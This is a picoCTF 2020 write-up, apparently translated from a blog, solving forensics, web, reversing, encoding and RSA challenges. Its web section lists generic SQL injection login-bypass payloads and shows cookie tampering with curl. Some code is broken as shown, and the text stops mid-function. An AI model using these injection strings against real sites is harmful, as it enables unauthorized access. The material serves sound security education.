picoCTF2020
煤矿路口西 Lv3

Forensics


Glory of the Garden

DL3wl9

What is a hex editor?

Following the hint, drag the file into WinHex and you eventually get the flag.

shark on wire 1

shark on wire 1

Try using a tool like Wireshark; What are streams?

Follow the UDP stream to get the flag. (MISC-AboutWireshark.md describes a similar approach.)

How do operating systems know what kind of file it is? (It’s not just the ending!) Make sure to submit the flag as picoCTF{XXXXX}

Opened directly it is a txt file; inspection shows it is actually in PNG format, and changing the file extension gives the flag.

So Meta

So Meta

What does meta mean in the context of files? Ever heard of metadata?

Same as the first challenge: open it in WinHex and search for the keyword to get the flag.

What Lies Within

buildings

There is data encoded somewhere… there might be an online decoder.

An online image steganography site recovers it; a new tool acquired.

I stopped using YellowPages and moved onto WhitePages… but the page they gave me is all blank!

#coding=utf-8
text='                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      '
firstType = ' '
secondType = ' '
binaryString = ''

for char in text: #Foreach char
    if char == firstType: #Check if it is the first type
        binaryString += '0' #Mark it as 0
    else:
        binaryString += '1' #Mark it as 1

print(binaryString) #Print result
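Turning that bit string into text, as an added example (not part of the original post): the decoder below assumes the page contains exactly two distinct whitespace characters and that every 8 bits form one ASCII byte. The sample input is constructed, with U+2003 and U+0020 as an assumed character pair.

```python
"""Decode text hidden as two kinds of whitespace (added example)."""


def whitespace_to_bits(text, zero_char, one_char):
    """Map the two whitespace characters to a string of '0' and '1'."""
    table = {zero_char: "0", one_char: "1"}
    return "".join(table[ch] for ch in text)


def bits_to_bytes(bits):
    """Group bits into bytes, dropping an incomplete trailing group."""
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def decode_whitespace(text):
    """Try both bit polarities and return the one that is printable ASCII.

    For ASCII text the top bit of every byte is 0, so the wrong polarity
    always produces bytes >= 128 and is rejected.
    """
    kinds = sorted(set(text))
    if len(kinds) != 2:
        raise ValueError(f"expected 2 distinct characters, found {len(kinds)}")
    candidates = []
    for zero, one in (kinds, kinds[::-1]):
        raw = bits_to_bytes(whitespace_to_bits(text, zero, one))
        if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            candidates.append(raw.decode("ascii"))
    if len(candidates) != 1:
        raise ValueError("no unambiguous printable decoding")
    return candidates[0]


def encode_for_demo(message, zero="\u2003", one=" "):
    """Build constructed sample input (assumed character pair)."""
    bits = "".join(f"{b:08b}" for b in message.encode("ascii"))
    return "".join(one if bit == "1" else zero for bit in bits)


# Constructed sample, not the challenge file
SAMPLE = encode_for_demo("picoCTF{constructed_sample}")

if __name__ == "__main__":
    print(decode_whitespace(SAMPLE))
```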

m00nwalk2

Covered in MISC-audio.md.

like1000

[like1000](This .tar file got tarred a lot.)

Try and script this, it’ll save you a lot of time

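import tarfile

# range() stops before its end value, so use 0 to include 1.tar
for i in range(1000, 0, -1):
    filename = str(i) + '.tar'
    # the context manager closes each archive after extraction
    with tarfile.open(filename) as tar:
        tar.extractall()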

WebNet0

Learned a new trick; written up in MISC-AboutWireshark.md.

Web Exploitation


How do you inspect web code on a browser? There’s 3 parts

Ctrl+U to view the page source -> 1/3 of the flag: picoCTF{tru3_d3

View the source of mycss.css -> 2/3 of the flag: t3ct1ve_0r_ju5t

View the source of myjs.js -> 3/3 of the flag: _lucky?2e7b23e3}

What part of the website could tell you where the creator doesn’t want you to look?

The hint points to robots, so request /robots.txt

This returns 👇

User-agent: *
Disallow: /1bb4c.html

Visit /1bb4c.html to get the flag.

Never trust the client

View the source:

function verify() {
    checkpass = document.getElementById("pass").value;
    split = 4;
    if (checkpass.substring(0, split) == 'pico') {
        if (checkpass.substring(split*6, split*7) == '706c') {
            if (checkpass.substring(split, split*2) == 'CTF{') {
                if (checkpass.substring(split*4, split*5) == 'ts_p') {
                    if (checkpass.substring(split*3, split*4) == 'lien') {
                        if (checkpass.substring(split*5, split*6) == 'lz_b') {
                            if (checkpass.substring(split*2, split*3) == 'no_c') {
                                if (checkpass.substring(split*7, split*8) == '5}') {
                                    alert("Password Verified")
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    else {
        alert("Incorrect password");
    }
}

Read the code and assemble the flag pieces in index order.

Hmm it doesn’t seem to check anyone’s password, except for logon’s?

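Following the hint, logging in as logon shows nothing. Inspecting the cookies with EditThisCookie, however, reveals a new admin entry; change admin from False to True, lock the cookie, add the path, and refresh to get the flag. 👇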

logon

What is obfuscation?

Can cookies help you to get the flag?

Learned another way to send cookies:

curl "https://jupiter.challenges.picoctf.org/problem/51400/" -H "Cookie:admin=True;time=1400;" -s

and

grep picoCTF

to search for the keyword.

You don’t need to download a new web browser

curl --user-agent "picobrowser" "https://jupiter.challenges.picoctf.org/problem/13759/flag" | grep picoCTF

This returns the line containing the flag.

There doesn’t seem to be many ways to interact with this. I wonder if the users are kept in a database? Try to think about how the website verifies your login.

This challenge introduced me to the "universal passwords" for web back ends:

"or "a"="a

')or('a'='a

or 1=1--

'or 1=1--

a'or' 1=1--

"or 1=1--

'or'a'='a

"or"="a'='a

'or''='

'or'='or'

1 or '1'='1'=1

1 or '1'='1' or 1=1

'OR 1=1

"or 1=1

'xor

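Put simply, you append an always-true condition to the input you send so that the query is guaranteed to succeed. Lesson learned. From this, the input that works for this challenge is: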

debug=1&password=&username=admin' or '1'=='1
username: admin' or '1'=='1
password:
SQL query: SELECT * FROM users WHERE name='admin' or '1'=='1' AND password=''

This gives the flag.

The password is being filtered.

debug=1&password=1&username=admin'--
username: admin'--
password: 1
SQL query: SELECT * FROM users WHERE name='admin'--' AND password='1'

Seems like the password is encrypted.

Trying

debug=1&password=adsf

the response echoes

password: adsf
SQL query: SELECT * FROM admin where password = 'nqfs'

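This differs from the input, so the program applies some kind of encryption to the input value. On inspection it is ROT13 decoding, so we can pass in our input ROT13-encoded.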

debug=1&password=' BE '1'='1

password: ' BE '1'='1
SQL query: SELECT * FROM admin where password = '' OR '1'='1'

This gives the flag.
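Why the three inputs above succeed, and what stops them, as an added example (not the challenge's server code): an in-memory SQLite table with a constructed user stands in for the back end, `login_concat` and `login_rot13_concat` are assumed reconstructions of the string-built queries seen in the debug output, and the `*_parameterized` functions are the corrected form.

```python
import codecs
import sqlite3


def make_db():
    """Constructed stand-in for the challenge database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db


def login_concat(db, username, password):
    # Vulnerable: input is pasted into the SQL text, so a quote in the
    # input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT * FROM users WHERE name='" + username +
           "' AND password='" + password + "'")
    return sql, db.execute(sql).fetchone() is not None


def rot13(value):
    return codecs.encode(value, "rot_13")


def login_rot13_concat(db, password):
    # Vulnerable: ROT13 is a fixed, keyless transform, so the client can
    # pre-apply it and still control the final SQL text.
    sql = "SELECT * FROM users WHERE password = '" + rot13(password) + "'"
    return sql, db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    # Hardened: values travel as bound parameters and are never parsed
    # as SQL. (Password hashing is omitted to keep the focus on the query.)
    row = db.execute(
        "SELECT 1 FROM users WHERE name = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def login_rot13_parameterized(db, password):
    row = db.execute(
        "SELECT 1 FROM users WHERE password = ?", (rot13(password),)
    ).fetchone()
    return row is not None


# Inputs taken from the write-up above
PAGE_INPUTS = [("admin' or '1'=='1", ""), ("admin'--", "1")]
PAGE_ROT13_INPUT = "' BE '1'='1"


def compare():
    """Return (input, concat_result, parameterized_result) for each input."""
    db = make_db()
    rows = []
    for user, pw in PAGE_INPUTS:
        rows.append((user, login_concat(db, user, pw)[1],
                     login_parameterized(db, user, pw)))
    rows.append((PAGE_ROT13_INPUT,
                 login_rot13_concat(db, PAGE_ROT13_INPUT)[1],
                 login_rot13_parameterized(db, PAGE_ROT13_INPUT)))
    return rows


if __name__ == "__main__":
    for entry in compare():
        print(entry)
```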

Reverse Engineering


vault-door-training

[vault-door-training](Your mission is to enter Dr. Evil’s laboratory and retrieve the blueprints for his Doomsday Project. The laboratory is protected by a series of locked vault doors. Each door is controlled by a computer and requires a password to open. Unfortunately, our undercover agents have not been able to obtain the secret passwords for the vault doors, but one of our junior agents obtained the source code for each vault’s computer! You will need to read the source code for each level to figure out what the password is for that vault door. As a warmup, we have created a replica vault in our training facility. The source code for the training vault is here: VaultDoorTraining.java)

The password is revealed in the program’s source code.

Reading the source is enough to solve it.

String input = userInput.substring("picoCTF{".length(),userInput.length()-1);

public boolean checkPassword(String password) {
    return password.equals("w4rm1ng_Up_w1tH_jAv4_3808d338b46");
}

vault-door-1

[vault-door-1](This vault uses some complicated arrays! I hope you can make sense of it, special agent. The source code for this vault is here: VaultDoor1.java)

Look up the charAt() method online.

Concatenate the characters in array-index order to get the flag.

vault-door-3

[vault-door-3](This vault uses for-loops and byte arrays. The source code for this vault is here: VaultDoor3.java)

Make a table that contains each value of the loop variables and the corresponding buffer index that it writes to.

public boolean checkPassword(String password) {
    if (password.length() != 32) {
        return false;
    }
    char[] buffer = new char[32];
    int i;
    for (i=0; i<8; i++) {
        buffer[i] = password.charAt(i);
    }
    for (; i<16; i++) {
        buffer[i] = password.charAt(23-i);
    }
    for (; i<32; i+=2) {
        buffer[i] = password.charAt(46-i);
    }
    for (i=31; i>=17; i-=2) {
        buffer[i] = password.charAt(i);
    }
    String s = new String(buffer);
    return s.equals("jU5t_a_sna_3lpm12g94c_u_4_m7ra41");
}

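Understand the script's logic and note:

- the scrambled string is 32 characters long

- take the corresponding positions from s in turn

- concatenate them to get the flag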
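The index table the hint asks for can be generated instead of written by hand. In this added example (not part of the original post) `scramble` is a Python port of the four Java loops, and the hypothetical helpers `source_indices` and `unscramble` derive the permutation by scrambling the list 0..31 and then invert it.

```python
TARGET = "jU5t_a_sna_3lpm12g94c_u_4_m7ra41"  # string compared in checkPassword


def scramble(seq):
    """Port of the four loops in checkPassword for any 32-item sequence."""
    if len(seq) != 32:
        raise ValueError("checkPassword only accepts 32 characters")
    buf = [None] * 32
    for i in range(0, 8):           # for (i=0; i<8; i++)
        buf[i] = seq[i]
    for i in range(8, 16):          # for (; i<16; i++)
        buf[i] = seq[23 - i]
    for i in range(16, 32, 2):      # for (; i<32; i+=2)
        buf[i] = seq[46 - i]
    for i in range(31, 16, -2):     # for (i=31; i>=17; i-=2)
        buf[i] = seq[i]
    return buf


def source_indices():
    """source_indices()[b] is the password index copied into buffer[b]."""
    return scramble(list(range(32)))


def unscramble(target):
    """Invert the permutation: put each buffer character back in place."""
    src = source_indices()
    if sorted(src) != list(range(32)):
        raise ValueError("mapping is not a permutation and cannot be inverted")
    password = [None] * 32
    for buf_idx, pw_idx in enumerate(src):
        password[pw_idx] = target[buf_idx]
    return "".join(password)


if __name__ == "__main__":
    for buf_idx, pw_idx in enumerate(source_indices()):
        print(f"buffer[{buf_idx:2}] <- password[{pw_idx:2}]")
    print("picoCTF{" + unscramble(TARGET) + "}")
```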

vault-door-4

[vault-door-4](This vault uses ASCII encoding for the password. The source code for this vault is here: VaultDoor4.java)

Use a search engine to find an “ASCII table”. You will also need to know the difference between octal, decimal, and hexadecimal numbers.

public boolean checkPassword(String password) {
    byte[] passBytes = password.getBytes();
    byte[] myBytes = {
        106 , 85 , 53 , 116 , 95 , 52 , 95 , 98 ,
        0x55, 0x6e, 0x43, 0x68, 0x5f, 0x30, 0x66, 0x5f,
        0142, 0131, 0164, 063 , 0163, 0137, 0146, 064 ,
        'a' , '8' , 'c' , 'd' , '8' , 'f' , '7' , 'e' ,
    };
    for (int i=0; i<32; i++) {
        if (passBytes[i] != myBytes[i]) {
            return false;
        }
    }
    return true;
}

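Process the rows of the array in turn: they are ASCII codes, hexadecimal, octal, and literal characters respectively; concatenate the results to get the flag.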

vault-door-5

[vault-door-5](In the last challenge, you mastered octal (base 8), decimal (base 10), and hexadecimal (base 16) numbers, but this vault door uses a different change of base as well as URL encoding! The source code for this vault is here: VaultDoor5.java)

You may find an encoder/decoder tool helpful, such as https://encoding.tools/; Read the wikipedia articles on URL encoding and base 64 encoding to understand how they work and what the results look like.

public String urlEncode(byte[] input) {
    StringBuffer buf = new StringBuffer();
    for (int i=0; i<input.length; i++) {
        buf.append(String.format("%%%2x", input[i]));
    }
    return buf.toString();
}
public boolean checkPassword(String password) {
    String urlEncoded = urlEncode(password.getBytes());
    String base64Encoded = base64Encode(urlEncoded.getBytes());
    String expected = "JTYzJTMwJTZlJTc2JTMzJTcyJTc0JTMxJTZlJTY3JTVm"
                    + "JTY2JTcyJTMwJTZkJTVmJTYyJTYxJTM1JTY1JTVmJTM2"
                    + "JTM0JTVmJTM4JTM0JTY2JTY0JTM1JTMwJTM5JTM1";
    return base64Encoded.equals(expected);
}

Concatenate the strings in expected, Base64-decode the result, then URL-decode it to get the flag.

vault-door-6

[vault-door-6](This vault uses an XOR encryption scheme. The source code for this vault is here: VaultDoor6.java)

If X ^ Y = Z, then Z ^ Y = X. Write a program that decrypts the flag based on this fact.

The hint shows this challenge is about XOR; after converting to binary I wrote a script (my own rubbish script follows)

modetext='01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010'
plaintext='0011101101100101001000011010000000111000000000000011011000011101101000000011110101100001001001110001000101100110001001111010000000100001000111010110000100111011101000000010110101100101001001111010000001100110001101100011000001100111011011000110010001101100'
plain=plaintext.replace(' ', '')
mode=modetext.replace(' ','')
print(mode)
new=''
# XOR bit by bit: a 0 bit keeps the key bit, a 1 bit flips it
for i in range(0,len(plain)):
    if(plain[i]=='0'):
        new += mode[i]
    elif(plain[i]=='1'):
        new += str(1-int(mode[i]))
print(new)
print(plain)

Converting the binary to characters gives the flag.

vault-door-7

[vault-door-7](This vault uses bit shifts to convert a password string into an array of integers. Hurry, agent, we are running out of time to stop Dr. Evil’s nefarious plans! The source code for this vault is here: VaultDoor7.java)

Use a decimal/hexadecimal converter such as this one: https://www.mathsisfun.com/binary-decimal-hexadecimal-converter.html; You will also need to consult an ASCII table such as this one: https://www.asciitable.com/

My script:

# The eight integers the vault compares against
x = [
    1096770097,
    1952395366,
    1600270708,
    1601398833,
    1716808014,
    1734293296,
    842413104,
    1684157793,
]
before=''
for i in range(0,8):
    # Each integer packs four password bytes, most significant byte first
    for shift in (24, 16, 8, 0):
        before += chr((x[i] >> shift) & 0xFF)
print(before)

After working through this run of RE challenges I understand scripting and reverse engineering somewhat better. Nice.

General Skills


2Warm

[2Warm]

Can you convert the number 42 (base 10) to binary (base 2)?

Convert decimal 42 to binary; an online converter is enough.

Warmed Up

[Warmed Up]

What is 0x3D (base 16) in decimal (base 10)?

Hexadecimal to decimal; same as above.

Lets Warm Up

[Lets Warm Up]

If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII?

Hexadecimal to ASCII; same as above.

strings it

[strings it ]

Can you find the flag in file without running it?

Run the command

strings XXX | grep picoCTF

to find the keyword.

Bases

[Bases]

What does this bDNhcm5fdGgzX3IwcDM1 mean? I think it has something to do with bases.

Run it through all the Base-family decoders in one go and look for a plausible string.

First Grep

[First Grep]

Can you find the flag in file? This would be really tedious to look through manually, something tells me there is a better way.

Opening the file directly reveals the flag.

what’s a net cat?

[what’s a net cat?]

Using netcat (nc) is going to be pretty important. Can you connect to jupiter.challenges.picoctf.org at port 29138 to get the flag?

nc jupiter.challenges.picoctf.org 29138

plumbing

[plumbing]

Sometimes you need to handle process data outside of a file. Can you find a way to keep the output from this program and search for the flag? Connect to jupiter.challenges.picoctf.org 22058.

nc jupiter.challenges.picoctf.org 22058 |grep picoCTF

Same as the previous challenge.

Based

[Based]

To get truly 1337, you must understand different data encodings, such as hexadecimal or binary. Can you get the flag from this program to prove you are on the way to becoming 1337? Connect with nc jupiter.challenges.picoctf.org 9670.

# nc jupiter.challenges.picoctf.org 9670
Let us see how data is stored
pie
Please give the 01110000 01101001 01100101 as a word.
...
you have 45 seconds.....

Input:
pie
Please give me the 163 157 143 153 145 164 as a word.
Input:
socket
Please give me the 636f6c6f7261646f as a word.
Input:
colorado
You've beaten the challenge
Flag: picoCTF{learning_about_converting_values_b375bb16}

Binary, octal and hexadecimal conversion.

mus1c

[mus1c](I wrote you a song. Put it in the picoCTF{} flag format.)

Do you think you can master rockstar?

Pico's a CTFFFFFFF
my mind is waitin
It's waitin

Put my mind of Pico into This
my flag is not found
put This into my flag
put my flag into Pico


shout Pico
shout Pico
shout Pico

My song's something
put Pico into This

Knock This down, down, down
put This into CTF

shout CTF
my lyric is nothing
Put This without my song into my lyric
Knock my lyric down, down, down

shout my lyric

Put my lyric into This
Put my song with This into my lyric
Knock my lyric down

shout my lyric

Build my lyric up, up ,up

shout my lyric
shout Pico
shout It

Pico CTF is fun
security is important
Fun is fun
Put security with fun into Pico CTF
Build Fun up
shout fun times Pico CTF
put fun times Pico CTF into my song

build it up

shout it
shout it

build it up, up
shout it
shout Pico

Searching for rockstar as the hint suggests leads to an online site, which decodes the song to

114
114
114
111
99
107
110
114
110
48
49
49
51
114
Program completed in 361 ms

Convert to ASCII to get the flag.

1_wanna_b3_a_r0ck5tar

[1_wanna_b3_a_r0ck5tar]

I wrote you another song. Put the flag in the picoCTF{} flag format

The previous challenge's method failed here. Reading the script, from lines such as

Rocknroll is right              
Silence is wrong
A guitar is a six-string

and so on, I guessed it was something like pseudocode; modifying it and running it gives the flag.

Cryptography


The Numbers

The Numbers

The flag is in the format PICOCTF{}

We get a string of numbers:

16 9 3 15 3 20 6 { 20 8 5 14 21 13 2 5 18 19 13 1 19 15 14 }

Following the hint and comparing against ASCII, the known part is

80 73 67 79 67 84 70 { }

Write a script using after = before + 64, or work it out by hand, to get the flag.

caesar

caesar

caesar cipher tutorial

An online site or a script can decrypt it; try every shift and pick the output that reads as meaningful text, which is the flag.

Easy1

Easy1

The one time pad can be cryptographically secure, but not when you know the key. Can you solve this? We’ve given you the encrypted flag, key, and a table to help UFJKXQZQUNB with the key of SOLVECRYPTO. Can you use this table to solve it?.

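Submit your answer in our flag format. For example, if your answer was ‘hello’, you would submit ‘picoCTF{HELLO}’ as the flag. Please use all caps for the message.

From the description, this scheme comes with a plaintext and a key; together with the table provided, that identifies it as a Vigenère cipher, which an online site or a script can decrypt to get the flag.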

13

[13](Cryptography can be easy, do you know what ROT13 is? cvpbPGS{abg_gbb_onq_bs_n_ceboyrz})

This can be solved online if you don’t want to do it by hand!

The challenge description says the cipher is ROT13; an online site or a script decrypts it.

la cifra de

[la cifra de](I found this cipher in an old book. Can you figure out what it says? Connect with nc jupiter.challenges.picoctf.org 50523)

There are tools that make this easy. Perhaps looking at history will help

Encrypted message:
Ne iy nytkwpsznyg nth it mtsztcy vjzprj zfzjy rkhpibj nrkitt ltc tnnygy ysee itd tte cxjltk

Ifrosr tnj noawde uk siyyzre, yse Bnretèwp Cousex mls hjpn xjtnbjytki xatd eisjd

Iz bls lfwskqj azycihzeej yz Brftsk ip Volpnèxj ls oy hay tcimnyarqj dkxnrogpd os 1553 my Mnzvgs Mazytszf Merqlsu ny hox moup Wa inqrg ipl. Ynr. Gotgat Gltzndtg Gplrfdo

Ltc tnj tmvqpmkseaznzn uk ehox nivmpr g ylbrj ts ltcmki my yqtdosr tnj wocjc hgqq ol fy oxitngwj arusahje fuw ln guaaxjytrd catizm tzxbkw zf vqlckx hizm ceyupcz yz tnj fpvjc hgqqpohzCZK{m311a50_0x_a1rn3x3_h1ah3x6kp60egf}

Ehk ktryy herq-ooizxetypd jjdcxnatoty ol f aordllvmlbkytc inahkw socjgex, bls sfoe gwzuti 1467 my Rjzn Hfetoxea Gqmexyt.

Tnj Gimjyèrk Htpnjc iy ysexjqoxj dosjeisjd cgqwej yse Gqmexyt Doxn ox Fwbkwei Inahkw.

Tn 1508, Ptsatsps Zwttnjxiax tnbjytki ehk xz-cgqwej ylbaql rkhea (g rltxni ol xsilypd gqahggpty) ysaz bzuri wazjc bk f nroytcgq nosuznkse ol yse Bnretèwp Cousex.

Gplrfdo’y xpcuso butvlky lpvjlrki tn 1555 gx l cuseitzltoty ol yse lncsz. Yse rthex mllbjd ol yse gqahggpty fce tth snnqtki cemzwaxqj, bay ehk fwpnfmezx lnj yse osoed qptzjcs gwp mocpd hd xegsd ol f xnkrznoh vee usrgxp, wnnnh ify bk itfljcety hizm paim noxwpsvtydkse.

Vigenère decryption on an online site gives the flag.

I spent ages fiddling with frequency analysis, sob.

rsa-pop-quiz

[rsa-pop-quiz](Class, take your seats! It’s PRIME-time for a quiz… nc jupiter.challenges.picoctf.org 41130)

RSA info

Working through the RSA steps one by one:

# nc jupiter.challenges.picoctf.org 41130
Good morning class! It's me Ms. Adleman-Shamir-Rivest
Today we will be taking a pop quiz, so I hope you studied. Cramming just will not do!
You will need to tell me if each example is possible, given your extensive crypto knowledge.
Inputs and outputs are in decimal. No hex here!
#### NEW PROBLEM ####
q : 60413
p : 76753
##### PRODUCE THE FOLLOWING ####
n
IS THIS POSSIBLE and FEASIBLE? (Y/N):y
#### TIME TO SHOW ME WHAT YOU GOT! ###
n: 4636878989
Outstanding move!!!


#### NEW PROBLEM ####
p : 54269
n : 5051846941
##### PRODUCE THE FOLLOWING ####
q
IS THIS POSSIBLE and FEASIBLE? (Y/N):y
#### TIME TO SHOW ME WHAT YOU GOT! ###
q: 93089
Outstanding move!!!


#### NEW PROBLEM ####
e : 3
n : 12738162802910546503821920886905393316386362759567480839428456525224226445173031635306683726182522494910808518920409019414034814409330094245825749680913204566832337704700165993198897029795786969124232138869784626202501366135975223827287812326250577148625360887698930625504334325804587329905617936581116392784684334664204309771430814449606147221349888320403451637882447709796221706470239625292297988766493746209684880843111138170600039888112404411310974758532603998608057008811836384597579147244737606088756299939654265086899096359070667266167754944587948695842171915048619846282873769413489072243477764350071787327913
##### PRODUCE THE FOLLOWING ####
q
p
IS THIS POSSIBLE and FEASIBLE? (Y/N):n
Outstanding move!!!


#### NEW PROBLEM ####
q : 66347
p : 12611
##### PRODUCE THE FOLLOWING ####
totient(n)
IS THIS POSSIBLE and FEASIBLE? (Y/N):y
#### TIME TO SHOW ME WHAT YOU GOT! ###
totient(n): 836623060
Outstanding move!!!


#### NEW PROBLEM ####
plaintext : 6357294171489311547190987615544575133581967886499484091352661406414044440475205342882841236357665973431462491355089413710392273380203038793241564304774271529108729717
e : 3
n : 29129463609326322559521123136222078780585451208149138547799121083622333250646678767769126248182207478527881025116332742616201890576280859777513414460842754045651093593251726785499360828237897586278068419875517543013545369871704159718105354690802726645710699029936754265654381929650494383622583174075805797766685192325859982797796060391271817578087472948205626257717479858369754502615173773514087437504532994142632207906501079835037052797306690891600559321673928943158514646572885986881016569647357891598545880304236145548059520898133142087545369179876065657214225826997676844000054327141666320553082128424707948750331
##### PRODUCE THE FOLLOWING ####
ciphertext
IS THIS POSSIBLE and FEASIBLE? (Y/N):y
#### TIME TO SHOW ME WHAT YOU GOT! ###
ciphertext: 256931246631782714357241556582441991993437399854161372646318659020994329843524306570818293602492485385337029697819837182169818816821461486018802894936801257629375428544752970630870631166355711254848465862207765051226282541748174535990314552471546936536330397892907207943448897073772015986097770443616540466471245438117157152783246654401668267323136450122287983612851171545784168132230208726238881861407976917850248110805724300421712827401063963117423718797887144760360749619552577176382615108244813
Outstanding move!!!


#### NEW PROBLEM ####
ciphertext : 107524013451079348539944510756143604203925717262185033799328445011792760545528944993719783392542163428637172323512252624567111110666168664743115203791510985709942366609626436995887781674651272233566303814979677507101168587739375699009734588985482369702634499544891509228440194615376339573685285125730286623323
e : 3
n : 27566996291508213932419371385141522859343226560050921196294761870500846140132385080994630946107675330189606021165260590147068785820203600882092467797813519434652632126061353583124063944373336654246386074125394368479677295167494332556053947231141336142392086767742035970752738056297057898704112912616565299451359791548536846025854378347423520104947907334451056339439706623069503088916316369813499705073573777577169392401411708920615574908593784282546154486446779246790294398198854547069593987224578333683144886242572837465834139561122101527973799583927411936200068176539747586449939559180772690007261562703222558103359
##### PRODUCE THE FOLLOWING ####
plaintext
IS THIS POSSIBLE and FEASIBLE? (Y/N):n
Outstanding move!!!


#### NEW PROBLEM ####
q : 92092076805892533739724722602668675840671093008520241548191914215399824020372076186460768206814914423802230398410980218741906960527104568970225804374404612617736579286959865287226538692911376507934256844456333236362669879347073756238894784951597211105734179388300051579994253565459304743059533646753003894559
p : 97846775312392801037224396977012615848433199640105786119757047098757998273009741128821931277074555731813289423891389911801250326299324018557072727051765547115514791337578758859803890173153277252326496062476389498019821358465433398338364421624871010292162533041884897182597065662521825095949253625730631876637
e : 65537
##### PRODUCE THE FOLLOWING ####
d
IS THIS POSSIBLE and FEASIBLE? (Y/N):y
#### TIME TO SHOW ME WHAT YOU GOT! ###
d: 1405046269503207469140791548403639533127416416214210694972085079171787580463776820425965898174272870486015739516125786182821637006600742140682552321645503743280670839819078749092730110549881891271317396450158021688253989767145578723458252769465545504142139663476747479225923933192421405464414574786272963741656223941750084051228611576708609346787101088759062724389874160693008783334605903142528824559223515203978707969795087506678894006628296743079886244349469131831225757926844843554897638786146036869572653204735650843186722732736888918789379054050122205253165705085538743651258400390580971043144644984654914856729
Outstanding move!!!


#### NEW PROBLEM ####
p : 153143042272527868798412612417204434156935146874282990942386694020462861918068684561281763577034706600608387699148071015194725533394126069826857182428660427818277378724977554365910231524827258160904493774748749088477328204812171935987088715261127321911849092207070653272176072509933245978935455542420691737433
ciphertext : 18031488536864379496089550017272599246134435121343229164236671388038630752847645738968455413067773166115234039247540029174331743781203512108626594601293283737392240326020888417252388602914051828980913478927759934805755030493894728974208520271926698905550119698686762813722190657005740866343113838228101687566611695952746931293926696289378849403873881699852860519784750763227733530168282209363348322874740823803639617797763626570478847423136936562441423318948695084910283653593619962163665200322516949205854709192890808315604698217238383629613355109164122397545332736734824591444665706810731112586202816816647839648399
e : 65537
n : 23952937352643527451379227516428377705004894508566304313177880191662177061878993798938496818120987817049538365206671401938265663712351239785237507341311858383628932183083145614696585411921662992078376103990806989257289472590902167457302888198293135333083734504191910953238278860923153746261500759411620299864395158783509535039259714359526738924736952759753503357614939203434092075676169179112452620687731670534906069845965633455748606649062394293289967059348143206600765820021392608270528856238306849191113241355842396325210132358046616312901337987464473799040762271876389031455051640937681745409057246190498795697239
##### PRODUCE THE FOLLOWING ####
plaintext
IS THIS POSSIBLE and FEASIBLE? (Y/N):y
#### TIME TO SHOW ME WHAT YOU GOT! ###
plaintext: picoCTF{wA8_th4t$_ill3aGal..ode01e4bb}
That's not an int! Exiting

Tapping

[Tapping](Theres tapping coming in from the wires. What’s it saying nc jupiter.challenges.picoctf.org 28927.)

What kind of encoding uses dashes and dots? The flag is in the format PICOCTF{}

Decode the Morse code.

Mr-Worldwide

[Mr-Worldwide](A musician left us a message. What’s it mean?)

They are coordinates; look up the latitude and longitude on Baidu and take the first letter of each city to get the flag.

Flags

[Flags](What do the flags mean?)

The flag is in the format PICOCTF{}

A simple substitution cipher; find the matching site and image via Baidu. https://en.wikipedia.org/wiki/International_maritime_signal_flags

waves over lambda

[waves over lambda](We made a lot of substitutions to encrypt this. Can you decrypt it? Connect with nc jupiter.challenges.picoctf.org 1981.)

Flag is not in the usual flag format

Frequency analysis again; after inspection I guessed jgsk = flag, then fed it to an online solver to get the flag.

miniRSA

miniRSA

RSA tutorial; How could having too small an e affect the security of this 2048 bit key? Make sure you don’t lose precision, the numbers are pretty big (besides the e value)

from Crypto.Util.number import *
import gmpy2

N=29331922499794985782735976045591164936683059380558950386560160105740343201513369939006307531165922708949619162698623675349030430859547825708994708321803705309459438099340427770580064400911431856656901982789948285309956111848686906152664473350940486507451771223435835260168971210087470894448460745593956840586530527915802541450092946574694809584880896601317519794442862977471129319781313161842056501715040555964011899589002863730868679527184420789010551475067862907739054966183120621407246398518098981106431219207697870293412176440482900183550467375190239898455201170831410460483829448603477361305838743852756938687673
e=3
c=2205316413931134031074603746928247799030155221252519872650080519263755075355825243327515211479747536697517688468095325517209911688684309894900992899707504087647575997847717180766377832435022794675332132906451858990782325436498952049751141
m = int(gmpy2.iroot(c, e)[0])
print(long_to_bytes(m))
print(m)
#b'picoCTF{n33d_a_lArg3r_e_d0cd6eae}'
#13016382529449106065894479374027604750406953699090365388203722801043052339225981

b00tl3gRSA2

[b00tl3gRSA2](In RSA d is a lot bigger than e, why don’t we use d to encrypt instead of e? Connect with nc jupiter.challenges.picoctf.org 42900.)

What is e generally?

After connecting with nc, e turns out to be very large; a Wiener attack script:

import RSAwienerHacker
c=67725484828660171155495211630497256983804750771405173604915475315285337259554745019946599487641055680169265457644340938264529723371169972500050850583888499676593738216542714158045211992126456724042909731789545505279795504523037528761238149430515678580782074452909931229053012113137701929175885390372056497999
n=92908556262738254094065441172814586106067369443369499189214986491976931561738844273516700957530563178532708425726354645373760924007923816005398578319882528611540185427918571906094044173194388663365364134997826444445816336765012006409280712402476371185929572990909183399977560298360727962550970347800300222711
e=69520159460585947518483836148643582831918423640590763549444035011978832519891224565191960240113848478143117452571748866357688968863765140502139873387990270685914837356707507222866135679527601234329281217279226396840073020368275802208410100769859080342284164663788369069928003055037897805163984210272130270657
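d = RSAwienerHacker.hack_RSA(e,n)
if d:
    print(d)
    #import hashlib
    import binascii
    #flag =hashlib.md5(hex(d)).hexdigest()
    #print flag
    # decrypt only when a private exponent was actually recovered
    m=pow(c,d,n)
    print(hex(m))

Converting the hex to a string gives the plaintext.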
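What a Wiener attack computes, as an added example (this is not the code of the RSAwienerHacker module used above): the continued-fraction method written in plain Python as a check for whether a public key leaks a small private exponent. It runs on a constructed toy key, n = 90581 = 379 × 239 with e = 17993, not on the challenge's values.

```python
from math import isqrt


def convergents(num, den):
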